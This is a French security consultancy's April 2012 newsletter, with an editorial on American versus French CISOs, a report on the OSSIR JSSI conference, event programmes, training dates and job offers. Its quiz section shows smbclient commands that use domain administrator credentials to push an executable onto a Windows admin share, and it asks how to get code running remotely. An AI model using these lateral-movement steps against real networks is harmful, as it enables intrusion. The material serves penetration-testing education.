[Newsletter HSC] N°92 - Avril 2012

Newsletter d'information de HSC newsletter at hsc-news.com
Lun 2 Avr 13:33:18 CEST 2012


========================================================================
              HSC Newsletter  --  N°092 --  avril 2012
========================================================================




 « On ne ment jamais tant qu'avant les élections, pendant la guerre et 
   après la chasse. »

                                                  [ Georges Clémenceau ]





--[ Sommaire ]----------------------------------------------------------

      1. Éditorial : CISO vs RSSI
      2. Le saviez-vous ? La question
      3. Compte-rendu de la conférence "JSSI" de l'OSSIR
      4. HSC partenaire des 4ièmes GS-DAYS
      5. Programme de la conférence "SMSI et normes ISO 27001" demain 3 avril
      6. Programme de la conférence "GS-DAYS" demain 3 avril
      7. Prix de l'Innovation des Assises de la Sécurité
      8. Nouveautés du site web HSC
      9. Offres d'emploi : consultants & stagiaires techniques & orga
     10. Offre d'emploi : développeur Ruby On Rail (stage/alternance/...)
     11. Agenda des interventions publiques
     12. Prochaines formations HSC
     13. Actualité des associations : Club 27001 et OSSIR
     14. Le saviez-vous ? La réponse



--[ 1. Éditorial - Hervé Schauer ]--------------------------------------

	  Après une semaine passée en compagnie de 50 RSSI nord-américains
 (des CISO : Chief Information Security Officer), il est intéressant de
 s'interroger sur les différences avec nos RSSI européens, principalement
 francophones et français, que j'ai plus l'habitude de côtoyer. 
     Bien sûr, les américains se distinguent par une approche par la conformité
 et le déploiement de quelques mesures de sécurités a priori, et leur
 maintien dans le temps, sans aucune cartographie d'actifs, sans appréciation
 des risques, sans savoir pourquoi. Leur discours est qu'ils s'alignent sur le
 business, mais concrètement ils ne savent pas lequel ni comment.
 Au-delà de cette constatation il faut interpréter cela comme du pragmatisme :
 le CISO doit commencer par des urgences sans avoir un engagement approprié
 de la direction, sans avoir le temps et la possibilité de tout comprendre,
 ni d'aller interviewer les gens, ni d'apprécier les risques, donc il fait de
 suite de la sécurité opérationnelle, il fait des tests de vulnérabilités, il
 met en place une gestion des incidents de sécurité sans attendre qu'un
 premier incident lui arrive. Donc le CISO américain met en place des mesures
 avec les moyens qu'il a, et les maintient dans le temps. Il le fait a priori,
 sans savoir pourquoi, juste dans son approche 'conformité'.

     Au-delà de cette différence classique d'approche par la conformité,
 et de l'utilisation de la gestion des risques que plus tard, il faut ajouter
 le fait qu'ils ne connaissent rien à l'ISO27001, pas même son existence.
 Quand un CISO américain connaît c'est parce que quelqu'un leur a demandé
 de s'y intéresser, mais souvent c'était une partie prenante japonaise,
 chinoise, ou européenne, mais pas une autre société américaine. Ils
 reproduisent les principes, connaissent Deming et la qualité, mais pas
 l'ISO 27001. Ils assimilent "ISO" à ISO 27002, c'est ISO 27002 qu'ils
 connaissent et rien d'autre des normes.
 
     Autre petite différence à mes yeux, ils ont tous une connaissance et une
 capacité à gérer des projets, à gérer le changement et à gérer les processus
 achats de manière très détaillée, ce sont des managers au sens large ou des
 individus qui tentent de l'être.

     La plus forte différence c'est sur le plan technique. Je suis très
 impressionné par les connaissances techniques approfondies des CISO
 américains, et leur volonté de combler leurs lacunes techniques.
 Même pour des CISO pas rattachés au DSI mais rattachés à la direction, ils
 cumulent à l'aspect politique de la fonction un côté opérationnel très fort
 de la sécurité, et quasi-systématique. Ils veulent comprendre et savoir
 mesurer le temps que doit prendre chaque tâche technique, de
 l'approvisionnement d'un rôle à la suppression d'une règle dans un firewall,
 ils veulent comprendre le fonctionnement et l'utilité des dispositifs de
 sécurité et connaître tous les mécanismes de contournement de ces dispositifs.
 Plus impressionnant encore à mes yeux, les CISOs américains savent utiliser
 et exploiter par eux-mêmes et sans aide externe tous les logiciels libres
 utiles en SSI. Pour la recherche de vulnérabilités ce n'est pas juste
 lancer Nessus, mais aussi maîtriser hping, p0f et nmap comme en France
 cela serait demandé à un consultant en audit de sécurité. Ils savent comment
 marche TCP/IP, comment analyser eux-mêmes des journaux, pas pour le faire,
 ils n'ont pas à le faire eux-mêmes, mais simplement parce que pour savoir
 recruter ceux qui auront à le faire, pour encadrer et utiliser les résultats
 de ceux qu'ils le feront, ils veulent savoir le faire eux-mêmes. Cela m'a
 étonné et épaté. Dans la culture nord-américaine une personne expérimentée
 et technique est très bien vue, alors qu'en France elle ne progresse plus
 vraiment dans sa carrière et aura tendance à être dénigrée.

     Si nous avons à apprendre aux américains en terme de gestion des
 risques, ils sont techniquement très impressionnants. Cette compétence
 technique des CISO américains est peut-être à méditer du côté français.



--[ 2. Le saviez-vous ? La question ]-----------------------------------

     Lors d'un test d'intrusion mené au sein d'un domaine Windows et après une
 première intrusion sur l'une des machines du domaine, il est souvent obtenu
 l'accréditation d'un compte administrateur local des machines ou
 administrateur du domaine. Il est alors intéressant de se connecter sur les
 différentes machines du réseau pour y obtenir des informations (mots de passe
 locaux, mots de passe en mémoire, informations contenues sur la machine, etc).

 Ayant théoriquement tous les droits sur une machine distante, et dans le cas
 où le bureau à distance n'est pas disponible, il est possible d'y déposer des
 fichiers exécutables ou de lancer un programme à distance via psexec.

 Pourtant un cas existe présentant les symptômes suivant : 

$ smbclient -U 'DOMAIN\ADMIN%password' //10.0.0.1/C$
Domain=[DOMAIN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
smb: \> put executable.exe
NT_STATUS_ACCESS_DENIED opening remote file \executable.exe

Pourtant le dépôt d'un fichier texte ne pose aucun problème :

smb: \> put test.txt
putting file test.txt (3387.1 kb/s) (average 3387.1 kb/s)
smb: \> ls
  .                                   D        0  Thu Feb 16 16:13:05 2012
  ..                                  D        0  Thu Feb 16 16:13:05 2012
  test.txt                            A   430080  Thu Feb 16 16:13:05 2012

		59612 blocks of size 4194304. 57392 blocks available

 De même, le lancement de psexec via metasploit retourne l'erreur : 
NT_STATUS_ACCESS_DENIED

 Que se passe-t-il ? Comment contourner et lancer un exécutable à distance ?


     Réponse au paragraphe 14.



--[ 3. Compte-rendu de la conférence "JSSI" de l'OSSIR ]----------------
    Par Pascal Mazon et Jérémy Rubert

     Le 13 mars dernier s'est déroulée au Fiap Jean Monnet la 11è Journée de la
 Sécurité des Systèmes d'Information (JSSI) organisée par l'OSSIR.

     La conférence a débuté par une présentation de Philippe Bernard, RSSI
 France de MBDA, présentant sa vision en tant que client d'audits de
 sécurité. Il a ainsi rappelé les différentes raisons de faire un audit, les
 avantages de faire appel à une société de services pour le réaliser, en
 particulier l'impact plus fort pour la direction, et les critères de
 choix. Parmi ceux-ci, la confiance en l'entreprise, sa réputation et la
 qualité de sa réponse ressortent tout particulièrement. Philippe Bernard
 conclut sur l'adhésion de l'équipe auditée et sur les aspects positifs et
 négatifs à présenter équitablement dans la restitution.

     Le deuxième exposé a porté sur le pare-feu applicatif Naxsi, présenté par
 Thibault Koechlin de NBS System. Après une rapide revue des risques liés aux
 applications web, le vif du sujet a été abordé. Naxsi met en avant quatre
 objectifs, à savoir la sécurité, les performances, l'industrialisation et la
 souplesse. Grâce à un mode d'apprentissage (analyse de requêtes légitimes), le
 logiciel génère une liste blanche. Le fonctionnement se veut simple (42 règles
 prévues pour contrer les SQLi, XSS, RFI/LFI, etc.) et ouvert (licence
 GPLv3). Naxsi a été mis en oeuvre en très peu de temps suite à la défiguration
 du site de Charlie Hebdo. Après une semaine 32000 requêtes HTTP et 200
 adresses IP ont été bloquées.

     La troisième présentation concernait les aspects légaux des Tests
 d'Intrusion. Frédéric Connes d'HSC, ingénieur informaticien et docteur en
 droit, nous a ainsi rappelé les enjeux des TI au regard de la loi. En
 particulier, l'article 323-1 du code pénal qui prévoit de punir les accès
 aux Systèmes de Traitement Automatisé de Données, qui sont fait de manière
 *frauduleuse*. Avec le consentement de l'audité, l'accès n'est plus
 frauduleux et n'entre pas sous le coup de la loi. Des explications sur les
 éléments à intégrer dans la convention d'audit ont été faites, pour s'assurer
 d'être bien couvert. Par exemple, le dépôt de preuve d'intrusion doit être
 formalisé dans la convention d'audit. Frédéric Connes est également revenu sur
 l'utilisation, la détention, etc. d'un outil d'intrusion, qui est possible
 pour un motif légitime (ce qui est le cas des TI), en respect de l'article
 323-3 du code pénal. Un dernier point portait sur l'usurpation d'identité,
 très utile pour l'ingénierie sociale. L'usurpation est possible à condition
 qu'elle ne trouble pas la tranquillité de la victime.

     Pour clore la matinée, Jean-Philippe Gaulier, OSSIR, a animé une table
 ronde, réunissant :
  - Philippe Bernard (RSSI MBDA)
  - Olivier Caleff (Fédération des Professionnels des Tests Intrusifs)
  - Olivier Dembour (ARJEL)
 Cette dernière a été l'occasion de débattre du métier de prestataire en SSI,
 avec notamment une différenciation des chartes de prestataire d'audit
 proposées par l'ANSSI et la FPTI. Cela soulève le problème des prestataires
 venus uniquement pour l'argent, qui n'ont pas pour autant de problème à
 respecter le cadre "réglementaire". La pertinence de la qualification
 personnelle et d'entreprise a été ensuite débattue ; le milieu de la sécurité
 étant restreint, le bouche à oreille reste aussi une source privilégiée. Pour
 finir, un débat sur le Cloud Computing a émergé, d'où il est ressorti que la
 législation française doit être impérativement respectée et les contraintes
 doivent être imposées par les clients, non pas par les prestataires
 d'externalisation.

     Laurent Butti, Orange Portals, a ouvert l'après-midi avec un retour
 d'expérience sur les outils d'audit d'applications Web en boite noire en se
 basant uniquement sur des outils open source. Le contexte d'une application
 web et de son exposition aux attaques a été d'abord exposé. L'importance de la
 performance des trois briques qui composent un outil d'audit d'application
 (crawler, brique d'injection et algorithmes de découverte) a été rappelée. Si
 l'une d'entre elle est peu efficace, c'est toute l'analyse qui deviendra
 médiocre. Le conférencier nous a fait part de son retour d'expérience suite
 aux tests qu'il a menés. Il en ressort de bons résultats sur des sites dits
 "simples" à parcourir contrairement aux sites contenants beaucoup de
 JavaScript. Le plus performant de ces outils est, a priori, arachni full avec
 une configuration de base qui peut être modifiée pour grandement améliorer ses
 performances. Ces outils ont toutefois leurs limites. Face à un site
 complexe, l'analyse doit être manuelle. Dans tous les cas une analyse manuelle
 reste indispensable pour vérifier les résultats et être plus exhaustif.

     La seconde présentation de l'après-midi concernait les injections NoSQL,
 base de données utilisée aujourd'hui par les grands du web par souci de
 performance. Nicolas Viot, de NGM Security, a commencé par présenter ce qu'est
 une base de données NoSQL, à savoir, une base de données non relationnelle qui
 ne possède pas de schéma pré-défini et qui n'utilise plus le langage SQL. Une
 fois la syntaxe utilisée pour une de ces bases de données présentée, des
 démonstrations d'injection sur MongoDB ont été faites. Ces injections sont
 similaires aux injections SQL classiques et offrent les mêmes capacités. Le
 NoSQL est une nouvelle technologie qui possède les mêmes vulnérabilités que
 les anciennes. La gestion des entrées utilisateurs reste donc centrale dans la
 sécurité des applications. Le NoSQL reste toutefois, pour le moment, non
 standardisé, chaque base possède son propre langage. Il est donc  difficile
 d'automatiser ces attaques.

     Nicolas Grégoire, Agarri, nous a par la suite présenté une conférence
 intitulée XML et sécurité. Une mise à niveau sur le XML a d'abord été faite en
 rappelant les différents cas d'usages du XML (SVG, SOAP, XSL, XSPF, RSS, ...).
 La principale question à se poser pour identifier une vulnérabilité est
 la suivante : "Le contenu XML est-il interprété ?". Deux cas de détournement
 du XML ont été exposés. Tout d'abord l'encapsulation d'un PDF malfaisant dans
 du XDP, ce qui le rend totalement indétectable par les antivirus à l'heure
 actuelle, démonstration à l'appui. Puis un cas de déni de service a été
 présenté en générant une énorme quantité de données lors de l'ouverture d'un
 PDF (technique de la "XMLBomb", ou "Lol 10^9"), ce qui a pour effet de saturer
 les ressources de la machine ciblée (CWE-776).

     Pour finir cette journée, Nicolas Hanteville, Devoteam, a fait une
 présentation du forensic Windows. Le sujet étant extrêmement vaste, la
 conférence a porté sur la base de registre, le système de fichiers et les
 journaux. Après avoir exposé les causes d'une investigation inforensique,
 différents moyens et outils pour récupérer ces informations ont été
 cités. Suite au constat d'un nombre limité d'outils ou effectuant une analyse
 globale de la machine et bien souvent payants, la conférence s'est finie sur
 la présentation d'un outil libre pour effectuer des analyses inforensique
 Windows : RtCA. Il est programmé en C 32bits ou 64bits et il est compatible
 Windows XP, 2003, 2008, 7, 8 ainsi qu'avec Wine.



--[ 4. HSC partenaire des 4èmes GS-DAYS ]------------------------------

     HSC sera à nouveau présent comme l'an dernier aux 4ème GS-Days 2012 demain
 mardi 3 avril 2012 : http://www.gsdays.fr/HSC-Herve-Schauer-Consultant.html
 avec un stand. Les GS-Days se tiennent au coeur de Paris à coté des Halles à
 l'espace Saint-Martin  : http://www.espacesaintmartin.com/paris/html/plan.html

     Matthieu Hentzien et Lynda Benchikh seront à votre disposition pour
 vos projets de prestations et de formation. Retrouvez-nous sur notre stand
 durant toute la journée.

     Romain Coltel fera une présentation "Analyse des protections et
 mécanismes de chiffrement fournis par BitLocker".

     Le programme des conférences est publié au paragraphe 7. Le bulletin
 d'inscription est disponible sur :
 http://www.gsdays.fr/sinscrire/10-gsdays-2012.html
 Dans la rubrique "Code Promotionnel : " mettez le code d'HSC "a5253B".
 Vous ne payerez que 100 ¤ HT pour toute la journée au lieu de 140 ¤ HT.
 Inscrivez-vous en ligne, ou bien renvoyez votre bulletin d'inscription par
 télécopie au +33 146 562 091, ou encore par messagerie à :
 Marc.Jacob at globalsecuritymag.com



--[ 5. Programme de la 5ème conférence "SMSI et normes ISO 27001" ]------

     Le Club 27001 (http://www.club-27001.fr/) organise sa cinquième
 conférence annuelle sur l'ensemble de la série des normes ISO 27001
 le mardi 3 avril 2012 à Paris à l'espace Saint-Martin, dans le
 cadre des GS-DAYS.

  8h45 : Accueil (petit déjeuner)
  9h30 : "L'avenir de l'ISO 27001"
          . Matthieu Grall, CNIL, co-rédacteur de l'ISO 27001 à l'ISO
 10h15 : "Retour d'expérience : mettre en place un SMSI dans le monde de
         la santé"
          . Guillaume Deraedt, RSSI, CHRU de Lille
 11h00 : Pause
 11h30 : "Retour d'expérience : certification d'une offre de service
          coffre-fort numérique"
          . Eric Rocheux, RSI, Banque de France
 12h15 : Déjeuner assis
 14h00 : "Résultats du groupe de travail ITIL & ISO 27001 de Toulouse :
          conseils et préconisations de mutualisation ISO 2700x et
          ISO 20000 /ITIL"
          . Nicolas Genotelle, On'X/Edelweb
          . Joris Pegli, SRC-Solution
          . Emmanuel Prat, Fullsave
          . Sébastien Rabaud, SCASSI
 14h45 : "Retour d'expérience : mise en oeuvre de l'ISO 27005"
          . Johann Fernandez, responsable du SMSI, La Banque Postale
          . Laetitia Vincens, La Banque Postale
 15h30 : Pause
 16h00 : "Mesures d'efficacité couplées à la gestion des incidents de sécurité"
          . Stéphane Sciacco, Orange Business Services
 16h45 : "Retour d'expérience : d'une certification ISO 9001 vers un SMI
          intégrant l'ISO 27001"
          . Philippe Dubourg, RSSI, URSSAF/CIRTIL
 17h30 : Table-ronde
 18h00 : Conclusion
          . Eric Doyen, RSSI de Generali et président du Club 27001


     Inscription à la conférence (inclut les pauses café et le déjeuner) :
         - 290 euros pour les adhérents au Club 27001,
         - 590 euros pour les non-adhérents

 Rappel : l'adhésion au Club 27001 n'est que de :
        - pour un particulier : 27 euros,
        - pour une entreprise : 270 euros (donnant droit à 5 entrées à la
          conférence au prix remisé), soit une économie jusqu'à 1500 euros

 Lieu : http://www.espacesaintmartin.com/paris/html/plan.html

 Contact : conference at club-27001.fr
 Le Club 27001 ne peut pas être joint par télécopie ou par téléphone.

 Bulletin d'inscription :
 http://www.club-27001.fr/attachments/article/110/inscriptionconf_2012.pdf

 Envoyez votre bulletin d'inscription complété au trésorier du Club 27001
 Bertrand Augé : tresorier at club-27001.fr



--[ 6. Programme de la conférence "GS-DAYS" du 3 avril ]-----------------

 Imprimez votre programme pour demain !

  8h30 : Accueil des participants

 --- Session plénière d'ouverture ---

  9h00 : Table-ronde animée par Marc Jacob, GlobalSecurityMag : "Qui est le
          maillon faible : l'homme ou la machine ?", avec
          . Eric Doyen, RSSI de Generali et président du Club 27001
          . Diane Mullenex, avocate, Ichay & Mullenex
          . Philippe Humeau, consultant en sécurité, dirigeant NBS System
 10h30 : pause

 --- Programme du cycle de conférences techniques ---

 11h00 : "Attaques par fuzzing sur les applications Adobe Flex utilisant
         le protocole AMF", Julia Benz, SCRT
 11h55 : "Analyse des protections et mécanismes de chiffrement fournis par
         BitLocker", Romain Coltel, HSC
 12h45 : Déjeuner
 14h15 : "Attaques réelles et backdoors .NET", Nicolas Ruff, EADS Innovation
         Works
 15h10 : "Mise en oeuvre d'un outil d'analyse statique de code source dans
         un cycle de développement d'applications Web", Laurent Butti et
         Olivier Moretti, Orange Portals
 16h00 : Pause
 16h30 : "La Fédération des Professionnels des Tests Intrusifs, 12 ans après"
         Matthieu Hentzien (HSC) et Olivier Revenu (EdelWeb), FPTI
 17h25 : "Piratage de Mac OS X", Arnaud Malard, Devoteam
 18h15 : Cocktail

 --- Programme du cycle de conférences organisationnelles et juridiques ---

 11h00 : "Sept manières infaillibles de faire condamner son RSSI",
         Thiébaut Devergranne, conseil de la Société Générale dans le
         cadre de l'affaire Kerviel
 11h55 : "Développer des applications Web sécurisées. Et après ?", Jérémie
         Jourdain, Advens
 12h45 : Déjeuner
 14h15 : "Un tableau de bord sécurité comme outil de communication"
         Olivier Allaire et Sébastien Michaud, Lineon
 15h10 : "Attaques ciblées : quelles évolutions pour la gestion de crise ?",
         Gérôme Billois et Frédéric Chollet, Solucom
 16h00 : Pause
 16h30 : "Quel protocole de fédération pour quel usage ? Complémentarité et
         interopérabilité des standards de fédération OAuth, OpenID et SAML
         dans des contextes BtoC et BtoB", Fabrice Vazquez, Harmonie
         Technologie
 17h25 : "Notification des failles de sécurité", Hervé Gabadou, Avocat
         Cabinet Courtois Lebel
 18h15 : Cocktail

 Inscription : http://www.gsdays.fr/sinscrire/10-gsdays-2012.html
 Dans la rubrique "Code Promotionnel : " mettez le code d'HSC "a5253B".
 Vous ne payerez que 100 ¤ HT pour toute la journée au lieu de 140 ¤ HT.
 Inscrivez-vous en ligne, ou bien renvoyez votre bulletin d'inscription par
 télécopie au +33 146 562 091, ou encore par messagerie à :
 Marc.Jacob at globalsecuritymag.com

 Lieu : http://www.espacesaintmartin.com/paris/html/plan.html

 Programme en ligne :
 http://www.gsdays.fr/373/actualites/programme-previsionnel-des-gs-days-2012-2/



--[ 7. Prix de l'Innovation des Assises de la Sécurité ]-----------------

     Attention, limite de dépot des candidatures le 16 avril !

     Pour la 7ème année consécutive sera décerné le Prix de l'Innovation
 des Assises de la Sécurité. Les Assises se dérouleront à Monaco du
 3 au 6 octobre 2012.

     Le jury du Prix 2012 est composé de :

     Hervé Schauer, HSC, président du jury
     Didier Gras, RSSI Groupe BNP Paribas, vice-président du jury
     Thierry Auger, DSI-adjoint Groupe Lagardère
     Emmanuel Dupuy, DSI Apax Partners
     Eric Grospeiller, FSSI Ministère de la Santé
     Cyril Gollain, CSO Brainwave (société lauréate en 2011)
     Maximilien Oursel, associé, Pleiade Venture
     Sylvain Thiry, RSSI Groupe SNCF
     Raphael Viard, RSSI Alstom

     Ce prix permet à une entreprise innovante dans le domaine de la
 sécurité des systèmes d'information de bénéficier d'un accès aux Assises
 de la Sécurité afin de démontrer son produit ou son service, avec la
 remise du prix en séance plénière le jeudi 4 octobre 2012, et un paquetage
 d'une valeur de 25000 euros :
     - un espace d'exposition pour démontrer sa solution et rencontrer
       les invités, la presse, etc. ;
     - un atelier pour présenter sa solution sous forme de conférence.
 Le prix est ouvert aux entreprises créées en 2010, 2011 ou 2012.
 Les critères utilisés par le comité de sélection sont notamment :
     - le caractère innovant et nouveau du produit ou service présenté ;
     - l'intérêt pour les RSSI et les métiers associés ;
     - les innovations technologiques dans la solution présentée ;
     - l'état d'avancement du projet et sa pertinence sur la marché.

    Le règlement complet et le dossier de candidature sont disponibles
 en téléchargement sur le site des Assises, rubrique Prix de l'Innovation :
 http://www.lesassisesdelasecurite.com/
 Le dossier est à remplir en ligne dès à présent et au plus tard jusqu'au 16
 avril 2012. N'hésitez pas à renvoyer cette annonce autour de vous et à faire
 part de votre intérêt à candidater auprès d'Hervé Schauer qui est à la
 disposition des candidats éventuels pour leurs questions.



--[ 8. Nouveautés du site web HSC ]-------------------------------------

 - HSC adhère à la FPTI (Fédération des Professionnels des Tests Intrusifs)
   le 12 mars 2012
   http://www.fpti.pro/

 - Présentation "Aspects juridiques des tests d'intrusions" par Frédéric
   Connes le 13 mars 2012 à la JSSI de l'OSSIR
   http://www.hsc.fr/ressources/presentations/jssi2012_juridique/

 - Brève "Pré-Qualification Nuit du hack 2012 - Write-up 4005" par Yves Le
   Provost le 23 mars 2012
   http://www.hsc.fr/ressources/breves/Rop_nuitduhack.html.fr

 - Nouvelle version de Dislocker, outil permettant de lire des partitions
   chiffrées avec BitLocker sous Linux... et MacOSX maintenant.
   http://hsc.fr/ressources/outils/dislocker/



--[ 9. Offres d'emploi pour consultants en sécurité ]-------------------

     HSC recrute des consultants en sécurité des systèmes d'information
 dans toutes les spécialités.

  +-------------------------------------------------------------------------+
  | HSC recherche particulièrement des consultants expérimentés (3 à 6 ans) |
  | en décompilation et retro-ingénierie, tests d'intrusion, systèmes       |
  | industriels (SCADA), ainsi que sur l'ISO27001 et la gestion des risques.|
  | Vous vous lassez des régies et des missions longues ? N'hésitez pas,    |
  | profitez de votre expérience pour postuler et faire de l'expertise.     |
  +-------------------------------------------------------------------------+

 Tous les consultants HSC deviennent avec l'expérience formateurs, et
 partagent leur expérience acquise lors des prestations en participant
 aux formations HSC.

 Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC, aussi
 bien sur les normes ISO 27001 et ISO 27005 ou le juridique de la SSI, qu'aux
 tests d'intrusion, à l'inforensique, la sécurité Windows la sécurité des
 applications web et la sécurité SCADA. Cela représente pour chaque nouveau
 consultant de 2 à 6 semaines de formations suivies dans le cadre de sa prise
 de fonction.

 HSC recherche également des stagiaires en fin d'études pour des stages de
 pré-embauche pour des postes de consultants, soit au sein de l'équipe
 technique, soit au sein de l'équipe conformité, risque et organisation
 de la sécurité.

 Tous les postes sont basés à Levallois-Perret (Paris), à 5 minutes de la gare
 Saint-Lazare. Les locaux sont spacieux et climatisés (735 m2).  Si vous
 souhaitez proposer votre candidature, nous vous remercions d'envoyer votre CV
 en texte ascii (pas de .doc) par courrier électronique à cv at hsc.fr.



--[ 10. Offre d'emploi développeur Ruby On Rails ]----------------------

     HSC recherche un développeur pour son application de gestion de la
 relation client développée en interne sur la technologie Ruby-On-Rails.

 * Description de l'application :

 Cette application de gestion de la relation client regroupe les données
 commerciales, permet le suivi des propositions commerciales, facilite
 la gestion des formations, gère les contacts, etc.

 HSC souhaite la faire évoluer pour pouvoir y centraliser la gestion
 d'une plus grande partie de son activité et y automatiser de nouvelles tâches.
 Les objectifs seront de (de façon non exhaustive) :
     - automatiser la création de documents administratifs ;
     - automatiser la gestion de calendriers internes ;
     - proposer des solutions pour améliorer l'ergonomie ;
     - améliorer l'intégration avec l'environnement HSC ;
     - récupérer des informations sur des sites externes pour alimenter
       les données de l'application ;
     - optimiser les performances ;
     - collaborer avec les différentes équipes (commerciales, techniques,
       organisationnelles) pour imaginer et implémenter des solutions pour
       accéder aux différentes informations stockées.

 Une grande liberté sera accordée aux choix d'implémentation pour les
 extensions à venir, ce qui requiert donc de la part du postulant de la
 méthode.

 * Environnement de travail :

 Vous travaillerez dans un environnement où les technologies et outils libres
 sont privilégiés :
     - langage de développement objet Ruby
     - framework Ruby On Rails
     - base de données MySQL
     - système d'exploitation Linux
     - gestionnaire de version Git
     - déploiement à l'aide de Capistrano.

     HSC a choisi Ruby On Rails pour le gain de temps qu'il apporte au
 développement de fonctionnalités complexes.  Structuré autour de la méthode
 "MVC" (modèle vue contrôleur), l'ensemble des conventions qu'il adopte permet
 à un développeur connaissant Rails de rapidement comprendre le fonctionnement
 d'une application pour être au plus vite capable de s'intégrer à son
 développement.

 L'ajout de fonctionnalités et leur intégration dans l'environnement HSC
 pourront de plus vous amener à vous intéresser à des technologies variées
 telles que :
     - le serveur de téléphonie Asterisk ;
     - la gestion des calendriers au format iCalendar ;
     - le serveur de listes électroniques Mailman ;
     - etc.

 * Profil recherché :
     - vous aimez la programmation objet et connaissez déjà un langage
       de programmation objet orienté Web (Ruby, PHP, Java, ASP, etc)
     - vous avez des connaissances sur les technologies du Web (HTML, CSS, SQL,
       Javascript, Ajax)
     - vous souhaitez vous mettre au Ruby On Rails dans une société avec
       une culture résolument geek
     - vous êtes motivé(e), ouvert(e), autonome, et capable de proposer des
       idées pour améliorer l'existant
     - vous avez des qualités de rédaction : documentation, commentaires dans
       le code source
     - ou encore mieux mais non nécessaire, vous connaissez déjà Ruby, et
       la technologie Ruby-On-Rails, par exemple au travers de projets
       personnels ou d'étude

 HSC propose un CDI, un contrat d'apprentissage ou d'alternance, un stage,
 ou tout autre possibilité suivant les souhaits du candidat. Rémunération
 motivante adaptée au profil et à l'expérience.

     Pour postuler à ce poste, envoyez votre CV et lettre de motivation en
 texte ascii (pas de PDF ou DOC) à cv-ruby at hsc.fr.



--[ 11. Agenda des interventions publiques ]----------------------------

 - 3 avril 2012 - GS-DAYS, Paris, Espace Saint-Martin
   "Analyse des protections et mécanismes de chiffrement fournis par BitLocker"
   Romain Coltel
   http://www.gsdays.fr/

 - 3 avril 2012 - GS-DAYS, Paris, Espace Saint-Martin
   "La Fédération des Professionnels des Tests Intrusifs, 12 ans après"
   par Matthieu Hentzien (HSC) pour la FPTI
   http://www.gsdays.fr/

 Retrouvez l'agenda de nos interventions publiques sur
 http://www.hsc.fr/conferences/agenda.html.fr



--[ 12. Prochaines formations HSC ]-------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        ISO 27001 Lead Implementer    ..........    : 2 au 6 avril (#)
        Correspondant Informatique et Libertés      : 5 et 6 avril
        Essentiel de PCI-DSS    ................    : 10 avril
        Sécurité du Cloud Computing    .........    : 11 au 13 avril
        ISO 27005 Risk Manager    ..............    : 16 au 18 avril (#)
        Risk Manager Avancé    .................    : 19 et 20 avril
        Sécurité du WiFi    ....................    : 3 et 4 mai (*)
        Juridique de la SSI    .................    : 21 et 22 mai
        Sécuriser Windows (SANS SEC505 / GIAC GCWN) : 21 au 25 mai (*)(#)
        ISO 27005 Risk Manager    ..............    : 29 au 31 mai (#)
        Essentiel du RGS    ....................    : 1er juin
        Sécuriser Unix&Linux (SANS SEC506/GIAC GCUX): 4 au 8 juin (*)(#)
        Tests d'intrusion applicatifs (SEC542/GWAPT): 4 au 8 juin (*)(#)
        ISO 27001 Lead Auditor    ..............    : 4 au 8 juin (#)
        ISO 27001 Lead Implementer    ..........    : 11 au 15 juin (#)
        Formation DNSSEC   .....................    : 14 et 15 juin (*)
        Inforensique Windows (SANS FOR408/GIAC GCFE): 18 au 22 juin (*)(#)
        Mesures de sécurité ISO 27002   ........    : 19 et 20 juin
        Gestion des incidents de sécurité/ISO27035  : 21 juin
        Indicateurs & tableaux de bord SSI/ISO27004 : 22 juin
        PenTesting/Ethical Hacking(SANS SEC560/GPEN): 25 au 29 juin (*)(#)
        ISO 27005 Risk Manager    ..............    : 2 au 4 juillet (#)
        Défense applications web (DEV522/GIAC CWAD) : 2 au 6 juillet (*)(#)
        Analyse inforensique (SANS FOR508/GIAC GCFA): 10 au 14 septembre (*)(#)
        Advanced Penetration Testing (SANS SEC660)  : 24 au 28 septembre (*)(#)
        Fondamentaux & principes de la SSI (SEC401) : 1 au 6 octobre (*)
        Formation RSSI    ......................    : 15 au 19 octobre
        Information Security Foundations    ....    : 12 et 13 novembre (#)
        Gestion des identités et des accès    ..    : 12 au 14 novembre


 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes
 (C) : session de formation complète

 - Luxembourg
        ISO 27005 Risk Manager    ..............    : 9 au 11 mai (#)
        ISO 27001 Lead Implementer    ..........    : 24 au 28 sept. (#)
        ISO 27001 Lead Auditor    ..............    : 5 au 9 novembre (#)

 - Bordeaux
        Correspondant Informatique et Libertés      : 11 et 12 octobre

 - Lille
        Correspondant Informatique et Libertés      : février 2013

 - Lyon
        ISO 27005 Risk Manager    ..............    : Nous contacter
        ISO 27001 Lead Implementer    ..........    : Nous contacter
        Correspondant Informatique et Libertés      : 20 et 21 septembre

 - Marseille
        Correspondant Informatique et Libertés      : mars 2013

 - Montpellier
        Correspondant Informatique et Libertés      : 30 et 31 mai

 - Nantes
        Correspondant Informatique et Libertés      : 14 et 15 mai

 - Nice
        ISO 27005 Risk Manager    ..............    : 25 au 27 juin (#)
        Risk Manager Avancé    .................    : 28 et 29 juin
        Correspondant Informatique et Libertés      : 22 et 23 novembre

 - Poitiers
        Correspondant Informatique et Libertés      : 14 et 15 novembre

 - Rennes
        Correspondant Informatique et Libertés      : 11 et 12 juin

 - Strasbourg
        Correspondant Informatique et Libertés .    : 28 au 29 juin

 - Toulouse
        Correspondant Informatique et Libertés .    : 26 et 27 avril (confirmé)
        ISO 27005 Risk Manager    ..............    : 21 au 23 mai (#)
        Risk Manager Avancé    .................    : 24 au 25 mai
        ISO 27001 Lead Implementer    ..........    : 18 au 22 juin (#)
        Juridique de la SSI    .................    : 24 et 25 septembre


 (#) : formations certifiantes

 HSC est certifié OPQF (http://www.opqf.com/) et ISO9001 (par Moody) sur
 ses formations.

 Pour tout renseignement, et pour vous inscrire contactez Lynda Benchikh :
 formations at hsc.fr -- +33 141 409 704

 Retrouvez les tarifs des formations dans la Newsletter n° 64 de janvier 2010
 au chapitre 6 : http://www.hsc-news.com/archives/2010/000064.html

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2012 en PDF sur http://www.hsc-formation.fr/



--[ 13. Actualité des associations : Club 27001 et OSSIR ]----------------

  o Club 27001 (http://www.club-27001.fr/)
     . Conférence annuelle du club demain mardi 3 avril 2012 à Paris !
       Programme de la conférence publié au paragraphe 5.
     . Prochaine réunion à Paris jeudi 24 mai chez ESR (Meudon)
           - Retour d'expérience par Cédric Cartau (CHU de Nantes)
